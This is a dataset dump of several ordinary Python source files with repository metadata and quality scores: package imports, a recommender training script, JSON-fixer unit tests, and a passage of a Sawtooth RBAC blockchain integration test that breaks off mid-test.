qsc_*_quality_signal (raw values, schema order): 18 | 132 | 6.333333 | 0.5 | 0.289474 | 0.473684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 132 | 3 | 47 | 44 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0
qsc_* filter flags (schema order): 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0
effective: 0 | hits: 7
Row 9: hexsha=aa04b571ee6f3062030c2dd29e2e926c19a39069 | size=105 | ext=py | lang=Python
max_stars_repo: path=exercises/data_structures/__init__.py | name=maxwellmattryan/cs-313e | head_hexsha=462a871475ba956e364a0faf98284633462984b8 | licenses=["MIT"] | count=1 | event: min=2020-02-05T23:56:16.000Z, max=2020-02-05T23:56:16.000Z
max_issues_repo: path=exercises/data_structures/__init__.py | name=maxwellmattryan/cs-313e | head_hexsha=462a871475ba956e364a0faf98284633462984b8 | licenses=["MIT"] | count=null | event: min=null, max=null
max_forks_repo: path=exercises/data_structures/__init__.py | name=maxwellmattryan/cs-313e | head_hexsha=462a871475ba956e364a0faf98284633462984b8 | licenses=["MIT"] | count=2 | event: min=2020-03-09T16:26:00.000Z, max=2021-07-23T03:17:11.000Z
content:
import data_structures.binary_search_tree
import data_structures.linked_list
import data_structures.stack
avg_line_length: 35 | max_line_length: 41 | alphanum_fraction: 0.92381
qsc_*_quality_signal (raw values, schema order): 15 | 105 | 6.066667 | 0.6 | 0.32967 | 0.659341 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.047619 | 105 | 3 | 42 | 35 | 0.91 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0
qsc_* filter flags (schema order): 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0
effective: 0 | hits: 7
Row 10: hexsha=aa0fb79a38d2cf1ad20735658dbd222d14c0338b | size=181 | ext=py | lang=Python
max_stars_repo: path=plugins/haveibeenpwned/icon_haveibeenpwned/actions/__init__.py | name=lukaszlaszuk/insightconnect-plugins | head_hexsha=8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | licenses=["MIT"] | count=46 | event: min=2019-06-05T20:47:58.000Z, max=2022-03-29T10:18:01.000Z
max_issues_repo: path=plugins/haveibeenpwned/icon_haveibeenpwned/actions/__init__.py | name=lukaszlaszuk/insightconnect-plugins | head_hexsha=8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | licenses=["MIT"] | count=386 | event: min=2019-06-07T20:20:39.000Z, max=2022-03-30T17:35:01.000Z
max_forks_repo: path=plugins/haveibeenpwned/icon_haveibeenpwned/actions/__init__.py | name=lukaszlaszuk/insightconnect-plugins | head_hexsha=8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | licenses=["MIT"] | count=43 | event: min=2019-07-09T14:13:58.000Z, max=2022-03-28T12:04:46.000Z
content:
# GENERATED BY KOMAND SDK - DO NOT EDIT
from .lookup_domain.action import LookupDomain
from .lookup_password.action import LookupPassword
from .lookup_user.action import LookupUser
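A hypothetical consumer sketch for generated re-exports like the ones above: callers can address the actions by class name from the package root. Only the class names come from the file; the registry pattern itself is illustrative, not part of the Komand SDK.

from icon_haveibeenpwned.actions import LookupDomain, LookupPassword, LookupUser

# Map action names to classes so a dispatcher can look them up by string.
ACTIONS = {cls.__name__: cls for cls in (LookupDomain, LookupPassword, LookupUser)}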
| 36.2 | 50 | 0.839779 | 25 | 181 | 5.96 | 0.68 | 0.201342 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116022 | 181 | 4 | 51 | 45.25 | 0.93125 | 0.20442 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 7
a4b8170eac942a873d8ddd749362614583413aed | 11,751 | py | Python | scripts/main_msd_vae.py | RACT-CF/RaCT | ced06c9e3398184c82aa42d5eb0cd5679c905375 | ["Apache-2.0"] | 36 | 2019-06-12T16:35:24.000Z | 2022-02-18T02:17:03.000Z | scripts/main_msd_vae.py | RACT-CF/RaCT | ced06c9e3398184c82aa42d5eb0cd5679c905375 | ["Apache-2.0"] | 1 | 2019-08-07T06:49:33.000Z | 2020-06-20T19:04:50.000Z | scripts/main_msd_vae.py | RACT-CF/RaCT | ced06c9e3398184c82aa42d5eb0cd5679c905375 | ["Apache-2.0"] | 6 | 2019-11-19T05:33:59.000Z | 2021-05-05T15:44:20.000Z
import sys
import os
UTILS_DIR = os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', 'utils')
sys.path.insert(1, UTILS_DIR)
from training import train, test
if __name__ == '__main__':
BREAK_EARLY = False
BATCH_SIZE = 500
print("For this one, I just want to try out a different KL or two. Because we didn't get the competitive results we asked for the other way.")
for data_subdir in ['msd']:
actor_path = "VAE_ACTOR_TRAIN_{}_KL=0.1".format(data_subdir)
train(
model_class='multi_vae',
data_subdir=data_subdir,
n_epochs_pred_only=100,
n_epochs_ac_only=0,
n_epochs_pred_and_ac=0,
# max_kl=0.2,
max_kl=0.1,
ac_reg_loss_scaler=0.0,
actor_reg_loss_scaler=0.01,
evaluation_metric="NDCG",
logging_frequency=200,
batch_size=BATCH_SIZE,
break_early=BREAK_EARLY,
verbose=False,
version_tag="FULL_RUN_ON_MSD_ONLY",
path_to_save_actor=actor_path,
log_critic_training_error=False,
)
print("Now, hopefully on to testing...")
test(
model_class='multi_vae',
data_subdir=data_subdir,
n_epochs_pred_only=100,
n_epochs_ac_only=0,
n_epochs_pred_and_ac=0,
# max_kl=0.2,
max_kl=0.1,
ac_reg_loss_scaler=0.0,
actor_reg_loss_scaler=0.01,
evaluation_metric="NDCG",
batch_size=BATCH_SIZE,
break_early=BREAK_EARLY,
verbose=False,
version_tag="FULL_RUN_ON_MSD_ONLY",
)
print("On to round 2! Now we'll do the critic.")
train(
model_class='multi_vae',
data_subdir=data_subdir,
n_epochs_pred_only=0,
n_epochs_ac_only=50,
n_epochs_pred_and_ac=50,
# max_kl=0.2,
max_kl=0.1,
ac_reg_loss_scaler=0.0,
actor_reg_loss_scaler=0.01,
evaluation_metric="NDCG",
logging_frequency=200,
batch_size=BATCH_SIZE,
break_early=BREAK_EARLY,
verbose=False,
version_tag="FULL_RUN_ON_MSD_ONLY",
restore_trained_actor_path=actor_path,
)
print("Now, hopefully on to testing...")
test(
model_class='multi_vae',
data_subdir=data_subdir,
n_epochs_pred_only=0,
n_epochs_ac_only=50,
n_epochs_pred_and_ac=50,
# max_kl=0.2,
max_kl=0.1,
ac_reg_loss_scaler=0.0,
actor_reg_loss_scaler=0.01,
evaluation_metric="NDCG",
batch_size=BATCH_SIZE,
break_early=BREAK_EARLY,
verbose=False,
version_tag="FULL_RUN_ON_MSD_ONLY",
restore_trained_actor_path=actor_path,
)
print("Bye bye")
exit()
# train(
# # model_class="wmf",
# model_class='multi_dae',
# # model_class='warp_encoder',
# n_epochs_pred_only=200,
# n_epochs_ac_only=0,
# n_epochs_pred_and_ac=0,
# # epochs_to_anneal_over=100,
# # min_kl=0.0001,
# max_kl=0.2,
# # ac_reg_loss_scaler=0.0005,
# ac_reg_loss_scaler=0.0,
# # actor_reg_loss_scaler=0.00001,
# actor_reg_loss_scaler=0.01,
# # positive_weights=positive_weights,
# # evaluation_metric='AP',
# evaluation_metric="NDCG",
# # logging_frequency=25,
# # logging_frequency=50,
# logging_frequency=50,
# batch_size=500,
# # batch_size=25,
# break_early=False,
# verbose=False,
# # path_to_save_actor="best_ndcg_trained_150_epochs",
# # path_to_save_last_actor="last_actor_after_150_trained_epochs",
# version_tag="TRAINING_DAE",
# path_to_save_actor="200_epochs_HIS_DAE",
# # path_to_save_last_actor="LAST_ACTOR_OF_200_epochs_HIS_KL_annealing",
# # restore_trained_actor_path="200_epochs_HIS_DAE",
# )
# print("Now, hopefully on to testing...")
# test(
# # model_class="wmf",
# model_class='multi_dae',
# # model_class='warp_encoder',
# n_epochs_pred_only=0,
# n_epochs_ac_only=50,
# n_epochs_pred_and_ac=100,
# # epochs_to_anneal_over=100,
# # min_kl=0.0001,
# max_kl=0.2,
# ac_reg_loss_scaler=0.0,
# actor_reg_loss_scaler=0.01,
# # positive_weights=positive_weights,
# # evaluation_metric='AP',
# evaluation_metric="NDCG",
# # logging_frequency=25,
# # logging_frequency=50,
# # logging_frequency=50,
# batch_size=500,
# # batch_size=25,
# break_early=False,
# verbose=False,
# # path_to_save_actor="best_ndcg_trained_150_epochs",
# # path_to_save_last_actor="last_actor_after_150_trained_epochs",
# version_tag="TRAINING_DAE",
# # path_to_save_actor="200_epochs_HIS_DAE",
# # restore_trained_actor_path="200_epochs_HIS_DAE",
# )
# print("On to round 2! Now we'll do the critic.")
# train(
# # model_class="wmf",
# model_class='multi_dae',
# # model_class='warp_encoder',
# n_epochs_pred_only=0,
# n_epochs_ac_only=50,
# n_epochs_pred_and_ac=100,
# # epochs_to_anneal_over=100,
# # min_kl=0.0001,
# max_kl=0.2,
# # ac_reg_loss_scaler=0.0005,
# ac_reg_loss_scaler=0.0,
# # actor_reg_loss_scaler=0.00001,
# actor_reg_loss_scaler=0.01,
# # positive_weights=positive_weights,
# # evaluation_metric='AP',
# evaluation_metric="NDCG",
# # logging_frequency=25,
# # logging_frequency=50,
# logging_frequency=50,
# batch_size=500,
# # batch_size=25,
# break_early=False,
# verbose=False,
# # path_to_save_actor="best_ndcg_trained_150_epochs",
# # path_to_save_last_actor="last_actor_after_150_trained_epochs",
# version_tag="TRAINING_DAE",
# # path_to_save_actor="200_epochs_HIS_DAE",
# # path_to_save_last_actor="LAST_ACTOR_OF_200_epochs_HIS_KL_annealing",
# restore_trained_actor_path="200_epochs_HIS_DAE",
# )
# print("Now, hopefully on to testing...")
# test(
# # model_class="wmf",
# model_class='multi_dae',
# # model_class='warp_encoder',
# n_epochs_pred_only=0,
# n_epochs_ac_only=50,
# n_epochs_pred_and_ac=100,
# # epochs_to_anneal_over=100,
# # min_kl=0.0001,
# max_kl=0.2,
# ac_reg_loss_scaler=0.0,
# actor_reg_loss_scaler=0.01,
# # positive_weights=positive_weights,
# # evaluation_metric='AP',
# evaluation_metric="NDCG",
# # logging_frequency=25,
# # logging_frequency=50,
# # logging_frequency=50,
# batch_size=500,
# # batch_size=25,
# break_early=False,
# verbose=False,
# # path_to_save_actor="best_ndcg_trained_150_epochs",
# # path_to_save_last_actor="last_actor_after_150_trained_epochs",
# version_tag="TRAINING_DAE",
# # path_to_save_actor="200_epochs_HIS_DAE",
# restore_trained_actor_path="200_epochs_HIS_DAE",
# )
# print("Bye bye")
# exit()
# for positive_weights in [2.0, 5.0, 10.0, 30.0, 50.0, 100.0]:
# train(
# model_class="wmf",
# # model_class='multi_vae',
# # model_class='warp_encoder',
# n_epochs_pred_only=50,
# n_epochs_ac_only=0,
# n_epochs_pred_and_ac=0,
# epochs_to_anneal_over=50,
# max_kl=0.2,
# ac_reg_loss_scaler=0.0005,
# actor_reg_loss_scaler=0.00001,
# positive_weights=positive_weights,
# # evaluation_metric='AP',
# evaluation_metric="NDCG",
# # logging_frequency=25,
# # logging_frequency=50,
# logging_frequency=50,
# batch_size=500,
# # batch_size=25,
# break_early=False,
# verbose=False,
# # path_to_save_actor="best_ndcg_trained_150_epochs",
# # path_to_save_last_actor="last_actor_after_150_trained_epochs",
# version_tag="making_one_trained_on_each_eval_metric",
# # path_to_save_actor="test_actor_save",
# # restore_trained_actor_path="last_actor_after_150_trained_epochs"
# )
# exit("Exiting gracefully!")
# # train(
# # model_class='multi_vae',
# # # model_class='warp_encoder',
# # n_epochs_pred_only=0,
# # n_epochs_ac_only=50,
# # n_epochs_pred_and_ac=100,
# # epochs_to_anneal_over=50,
# # max_kl=0.2,
# # ac_reg_loss_scaler=0.0005,
# # # evaluation_metric='AP',
# # evaluation_metric="NDCG",
# # # logging_frequency=25,
# # # logging_frequency=50,
# # logging_frequency=50,
# # batch_size=500,
# # # batch_size=25,
# # break_early=False,
# # verbose=False,
# # # path_to_save_actor="best_ndcg_trained_150_epochs",
# # # path_to_save_last_actor="last_actor_after_150_trained_epochs",
# # version_tag="making_one_trained_on_each_eval_metric",
# # # path_to_save_actor="test_actor_save",
# # restore_trained_actor_path="last_actor_after_150_trained_epochs"
# # )
# print("Just for good measure, I'm going to run the test function too.")
# test(
# model_class='multi_vae',
# # model_class='warp_encoder',
# n_epochs_pred_only=0,
# n_epochs_ac_only=50,
# n_epochs_pred_and_ac=100,
# epochs_to_anneal_over=50,
# max_kl=0.2,
# ac_reg_loss_scaler=0.0005,
# # evaluation_metric='AP',
# evaluation_metric="NDCG",
# # logging_frequency=25,
# # logging_frequency=50,
# # logging_frequency=50,
# batch_size=500,
# # batch_size=25,
# break_early=False,
# verbose=False,
# # path_to_save_actor="best_ndcg_trained_150_epochs",
# # path_to_save_last_actor="last_actor_after_150_trained_epochs",
# version_tag="making_one_trained_on_each_eval_metric",
# # path_to_save_actor="test_actor_save",
# restore_trained_actor_path="last_actor_after_150_trained_epochs"
# )
# exit("Bye bye now! I doubt it will make it here, but a man can dream.")
# for ac_reg_loss_scaler in [0.0, 1e-3, 1e-2, 1e-1]:
# train(
# model_class='multi_vae',
# # model_class='warp_encoder',
# n_epochs_pred_only=0,
# n_epochs_ac_only=50,
# n_epochs_pred_and_ac=50,
# epochs_to_anneal_over=50,
# max_kl=0.2,
# # evaluation_metric='AP',
# evaluation_metric="NDCG",
# # logging_frequency=25,
# logging_frequency=50,
# batch_size=500,
# # batch_size=25,
# break_early=False,
# verbose=False,
# ac_reg_loss_scaler=ac_reg_loss_scaler,
# version_tag="hyperparameter_ac_reg",
# # path_to_save_actor="best_ndcg_trained_100_epochs",
# # path_to_save_last_actor="last_actor_after_100_trained_epochs",
# # path_to_save_actor="test_actor_save",
# restore_trained_actor_path="best_ndcg_trained_100_epochs",
# )
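# Sketch of a possible cleanup (not part of the RaCT codebase): the four
# train()/test() calls above repeat most of their keyword arguments, so the
# shared settings could live in one dict and be splatted into each call,
# overriding only the per-phase fields. Parameter names mirror the script's
# own; the dict and call below are illustrative, hence left commented out.
# COMMON_KWARGS = dict(
#     model_class='multi_vae',
#     max_kl=0.1,
#     ac_reg_loss_scaler=0.0,
#     actor_reg_loss_scaler=0.01,
#     evaluation_metric="NDCG",
#     batch_size=BATCH_SIZE,
#     break_early=BREAK_EARLY,
#     verbose=False,
#     version_tag="FULL_RUN_ON_MSD_ONLY",
# )
# train(data_subdir=data_subdir, n_epochs_pred_only=100, n_epochs_ac_only=0,
#       n_epochs_pred_and_ac=0, logging_frequency=200,
#       path_to_save_actor=actor_path, log_critic_training_error=False,
#       **COMMON_KWARGS)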
| 34.259475 | 146 | 0.587099 | 1,485 | 11,751 | 4.152189 | 0.100337 | 0.040869 | 0.056925 | 0.054492 | 0.893124 | 0.888096 | 0.884204 | 0.876419 | 0.876419 | 0.865715 | 0 | 0.053102 | 0.304485 | 11,751 | 342 | 147 | 34.359649 | 0.701334 | 0.621905 | 0 | 0.756098 | 0 | 0.012195 | 0.101563 | 0.006104 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.036585 | 0 | 0.036585 | 0.060976 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7
35170ef513a8a0bd897201745a96b5f7f4c91dc3 | 2,146 | py | Python | tests/test_stop.py | half-pie/half-json | d8064e90ac769547c22db11bcbe47fcb4f1eb600 | ["MIT"] | 4 | 2020-08-04T15:14:25.000Z | 2021-08-18T18:29:03.000Z | tests/test_stop.py | half-pie/half-json | d8064e90ac769547c22db11bcbe47fcb4f1eb600 | ["MIT"] | 1 | 2019-06-04T15:01:31.000Z | 2019-06-04T15:01:31.000Z | tests/test_stop.py | half-pie/half-json | d8064e90ac769547c22db11bcbe47fcb4f1eb600 | ["MIT"] | 3 | 2019-06-01T14:16:32.000Z | 2021-06-25T10:10:47.000Z
# coding=utf8
import unittest
from half_json.core import JSONFixer
class TestOtherCase(unittest.TestCase):
def test_patch_left_object(self):
line = '}'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('{}', newline)
def test_patch_left_array(self):
line = ']'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('[]', newline)
def test_patch_half_array(self):
line = '[]]'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('[[]]', newline)
def test_patch_half_object(self):
line = '{}}'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('{"":{}}', newline)
def test_patch_half_object_array(self):
line = '{}]'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('[{}]', newline)
def test_patch_half_array_object(self):
line = '[]}'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('{"":[]}', newline)
def test_patch_half_array_with_coma(self):
line = '1, [""], -1]'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('[1, [""], -1]', newline)
def test_patch_half_array_with_coma_v2(self):
line = '1, 2'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('[1, 2]', newline)
def test_patch_half_object_with_colon(self):
line = '"a":'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('{"a":null}', newline)
def test_patch_many_half_object(self):
line = '{}[]{}}]'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('[{"":{},"":[],"":{}}]', newline)
def test_patch_string(self):
line = 'E"'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('"E"', newline)
| 28.613333 | 58 | 0.56617 | 234 | 2,146 | 4.961538 | 0.153846 | 0.066322 | 0.113695 | 0.198966 | 0.826012 | 0.826012 | 0.801034 | 0.801034 | 0.763135 | 0.763135 | 0 | 0.006345 | 0.26561 | 2,146 | 74 | 59 | 29 | 0.73033 | 0.005126 | 0 | 0.37931 | 0 | 0 | 0.057665 | 0.009845 | 0 | 0 | 0 | 0 | 0.37931 | 1 | 0.189655 | false | 0 | 0.034483 | 0 | 0.241379 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7
35185f7946a37445fcdf93fc6c4208d86886d823 | 78,601 | py | Python | integration_tests/blockchain/blockchain_integration_test.py | hyperultra/sawtooth-next-directory-poc | cb34b7b3d906bc5b5d429078ba5cf0ffc9af0401 | ["Apache-2.0"] | null | null | null | integration_tests/blockchain/blockchain_integration_test.py | hyperultra/sawtooth-next-directory-poc | cb34b7b3d906bc5b5d429078ba5cf0ffc9af0401 | ["Apache-2.0"] | null | null | null | integration_tests/blockchain/blockchain_integration_test.py | hyperultra/sawtooth-next-directory-poc | cb34b7b3d906bc5b5d429078ba5cf0ffc9af0401 | ["Apache-2.0"] | null | null | null
# Copyright 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
from base64 import b64decode
import sys
import logging
import time
import unittest
from uuid import uuid4
from urllib.request import urlopen
from urllib.error import HTTPError
from urllib.error import URLError
from sawtooth_cli.rest_client import RestClient
import sawtooth_signing
from sawtooth_signing.secp256k1 import Secp256k1PrivateKey
from rbac_addressing import addresser
from rbac_transaction_creation.protobuf import user_state_pb2
from rbac_transaction_creation.common import Key
from rbac_transaction_creation import manager_transaction_creation
from rbac_transaction_creation.user_transaction_creation import create_user
from rbac_transaction_creation import role_transaction_creation
from rbac_transaction_creation import task_transaction_creation
LOGGER = logging.getLogger(__name__)
LOGGER.level = logging.DEBUG
LOGGER.addHandler(logging.StreamHandler(sys.stdout))
BATCHER_PRIVATE_KEY = Secp256k1PrivateKey.new_random().as_hex()
BATCHER_KEY = Key(BATCHER_PRIVATE_KEY)
BATCHER_PUBLIC_KEY = BATCHER_KEY.public_key
def wait_until_status(url, status_code=200, tries=5):
"""Pause the program until the given url returns the required status.
Args:
url (str): The url to query.
status_code (int, optional): The required status code. Defaults to 200.
tries (int, optional): The number of attempts to request the url for
the given status. Defaults to 5.
Raises:
AssertionError: If the status is not received in the given number of
tries.
"""
attempts = tries
while attempts > 0:
try:
response = urlopen(url)
if response.getcode() == status_code:
return
except HTTPError as err:
if err.code == status_code:
return
LOGGER.debug('failed to read url: %s', str(err))
except URLError as err:
LOGGER.debug('failed to read url: %s', str(err))
sleep_time = (tries - attempts + 1) * 2
LOGGER.debug('Retrying in %s secs', sleep_time)
time.sleep(sleep_time)
attempts -= 1
raise AssertionError(
"{} is not available within {} attempts".format(url, tries))
def wait_for_rest_apis(endpoints, tries=5):
"""Pause the program until all the given REST API endpoints are available.
Args:
endpoints (list of str): A list of host:port strings.
tries (int, optional): The number of attempts to request the url for
availability.
"""
for endpoint in endpoints:
wait_until_status(
'http://{}/blocks'.format(endpoint),
status_code=200,
tries=tries)
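# Usage sketch (illustrative; not in the original test module): block until
# each REST API answers on its /blocks route before the suite starts, e.g.
#     wait_for_rest_apis(['rest-api:8080'], tries=10)
# Each retry backs off linearly, so the total wait grows as 2 + 4 + ... + 2*tries seconds.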
class TestBlockchain(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.client = RBACClient('http://rest-api:8080')
cls.key1, cls.user1 = make_key_and_name()
cls.key2a, cls.user2a = make_key_and_name()
cls.key3a, cls.user3a = make_key_and_name()
cls.key2b, cls.user2b = make_key_and_name()
cls.key_invalid, cls.user_invalid = make_key_and_name()
cls.key3b, cls.user3b = make_key_and_name()
cls.role_id1 = str(uuid4())
cls.task_id1 = str(uuid4())
cls.update_manager_proposal_id = str(uuid4())
cls.add_role_admins_proposal_id = str(uuid4())
cls.add_role_owners_proposal_id = str(uuid4())
cls.add_role_members_proposal_id = str(uuid4())
cls.add_role_tasks_proposal_id = str(uuid4())
cls.add_task_admins_proposal_id = str(uuid4())
cls.add_task_owners_proposal_id = str(uuid4())
cls.remove_task_admins_proposal_id = str(uuid4())
cls.remove_task_owners_proposal_id = str(uuid4())
def test_00_create_users(self):
"""Tests that the validation rules within the transaction processor
are applied correctly.
Notes:
1. User
CreateUser Validation rules:
- Public key given for manager must be in state as a User.
- User must not already exist.
- The signing public key must belong to the user or manager.
- The User must have a name longer than 4 characters.
Create 5 Users,
             user1
            /     \
           /       \
       user2a     user2b
         /            \
        /              \
    user3a           user3b
UpdateUserManager Validation rules:
"""
wait_for_rest_apis(['rest-api:8080'])
self.assertEqual(
self.client.create_user(
key=self.key1,
name=self.user1,
user_name=self.user1,
user_id=self.key1.public_key)[0]['status'],
'COMMITTED')
self.assertEqual(
self.client.create_user(
key=self.key1,
name=self.user2a,
user_name=self.user2a,
user_id=self.key2a.public_key,
manager_id=self.key1.public_key)[0]['status'],
'COMMITTED')
self.assertEqual(
self.client.create_user(
key=self.key3a,
name=self.user2b,
user_name=self.user2b,
user_id=self.key2b.public_key,
manager_id=self.key3a.public_key)[0]['status'],
'INVALID',
"The transaction is invalid because the public key given for "
"the manager does not exist in state.")
self.assertEqual(
self.client.create_user(
key=self.key2a,
name=self.user1,
user_name=self.user1,
user_id=self.key2a.public_key,
manager_id=self.key1.public_key)[0]['status'],
'INVALID',
"The transaction is invalid because the User already exists.")
self.assertEqual(
self.client.create_user(
key=self.key2a,
name=self.user2b,
user_name=self.user2b,
user_id=self.key2b.public_key,
manager_id=self.key1.public_key)[0]['status'],
'INVALID',
"The signing key does not belong to the user or manager.")
self.assertEqual(
self.client.create_user(
key=self.key_invalid,
name=self.user_invalid[:4],
user_name=self.user_invalid[:4],
user_id=self.key_invalid.public_key,
manager_id=None)[0]['status'],
'INVALID',
"The User's name must be at least 5 characters long.")
self.assertEqual(
self.client.create_user(
key=self.key2a,
name=self.user3a,
user_name=self.user3a,
user_id=self.key3a.public_key,
manager_id=self.key2a.public_key)[0]['status'],
'COMMITTED')
self.assertEqual(
self.client.create_user(
key=self.key1,
name=self.user2b,
user_name=self.user2b,
user_id=self.key2b.public_key,
manager_id=self.key1.public_key)[0]['status'],
'COMMITTED')
self.assertEqual(
self.client.create_user(
key=self.key3b,
name=self.user3b,
user_name=self.user3b,
user_id=self.key3b.public_key,
manager_id=self.key2b.public_key)[0]['status'],
'COMMITTED')
state_items = self.client.return_state()
self.assertEqual(len(state_items), 5, "There are 5 users in state.")
def test_01_create_roles(self):
"""Tests that the CreateRole validation rules are correct.
Notes:
Role:
CreateRole Validation rules
- There isn't already a Role with the same id
- The Admins listed are Users.
Role1
- Admins
- user1
- user2a
- Owners
- user2b
- Members
- user3a
- user3b
"""
_, role1 = make_key_and_name()
metadata = uuid4().hex
self.assertEqual(
self.client.create_role(
key=self.key1,
role_name=role1,
role_id=self.role_id1,
metadata=metadata,
admins=[self.key1.public_key, self.key2a.public_key],
owners=[self.key2b.public_key])[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.create_role(
key=self.key1,
role_name=role1,
role_id=self.role_id1,
metadata=metadata,
admins=[self.key2a.public_key],
owners=[self.key2b.public_key])[0]['status'],
"INVALID",
"The Role Id must not already exist.")
_, role2 = make_key_and_name()
role_id2 = uuid4().hex
self.assertEqual(
self.client.create_role(
key=self.key1,
role_name=role2,
role_id=role_id2,
metadata=metadata,
admins=[self.key_invalid.public_key, self.key2a.public_key],
owners=[self.key2b.public_key])[0]['status'],
"INVALID",
"All Admins listed must be Users")
self.assertEqual(
self.client.create_role(
key=self.key1,
role_name=role2,
role_id=role_id2,
metadata=metadata,
admins=[self.key2a.public_key],
owners=[self.key_invalid.public_key, self.key2b.public_key])[0]['status'],
"INVALID",
"All Owners listed must be Users")
def test_02_propose_update_user_manager(self):
"""Tests that the ProposeUpdateUserManager validation rules are
correct.
Notes:
ProposeUpdateUserManager Validation rules
- The user exists.
- The manager exists as a user.
- The transaction header signer's public key is the User's
current manager.
- No open proposal for the same change exists.
"""
self.assertEqual(
self.client.propose_update_manager(
key=self.key1,
proposal_id=uuid4().hex,
user_id=self.key_invalid.public_key,
new_manager_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The User must exist")
self.assertEqual(
self.client.propose_update_manager(
key=self.key_invalid,
proposal_id=uuid4().hex,
user_id=self.key1.public_key,
new_manager_id=self.key_invalid.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The manager must exist")
self.assertEqual(
self.client.propose_update_manager(
key=self.key3b,
proposal_id=uuid4().hex,
user_id=self.key2a.public_key,
new_manager_id=self.key2b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The current manager must sign the txn.")
self.assertEqual(
self.client.propose_update_manager(
key=self.key1,
proposal_id=self.update_manager_proposal_id,
user_id=self.key2a.public_key,
new_manager_id=self.key2b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.propose_update_manager(
key=self.key1,
proposal_id=uuid4().hex,
user_id=self.key2a.public_key,
new_manager_id=self.key2b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"There is already a proposal to make user2a have user2b "
"as a manager.")
def test_03_confirm_update_manager_proposal(self):
"""Tests the ConfirmUpdateUserManager validation rules.
Notes:
ConfirmUpdateUserManager validation rules
- The txn signer is the new manager
- The Proposal exists and is OPEN.
"""
self.assertEqual(
self.client.confirm_update_manager(
key=self.key1,
proposal_id=self.update_manager_proposal_id,
reason=uuid4().hex,
user_id=self.key2a.public_key,
manager_id=self.key2b.public_key
)[0]['status'],
"INVALID",
"The txn signer must be the new manager listed on the proposal")
self.assertEqual(
self.client.confirm_update_manager(
key=self.key2b,
proposal_id=uuid4().hex,
reason=uuid4().hex,
user_id=uuid4().hex,
manager_id=self.key2b.public_key)[0]['status'],
"INVALID",
"The proposal must exist")
self.assertEqual(
self.client.confirm_update_manager(
key=self.key2b,
proposal_id=self.update_manager_proposal_id,
